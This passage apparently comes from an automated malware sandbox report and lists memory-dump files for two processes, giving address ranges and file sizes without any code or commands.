                                                                                                                • memory/4136-13-0x0000000074710000-0x0000000074EC0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/4136-14-0x0000000074710000-0x0000000074EC0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/4136-713-0x0000000006350000-0x000000000635A000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  40KB

                                                                                                                • memory/4136-712-0x0000000074710000-0x0000000074EC0000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  7.7MB

                                                                                                                • memory/5068-39-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/5068-34-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/5068-40-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  2.0MB

                                                                                                                • memory/5068-37-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/5068-41-0x00007FFF06EC0000-0x00007FFF06F7E000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  760KB

                                                                                                                • memory/5068-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/5068-44-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/5068-35-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  32KB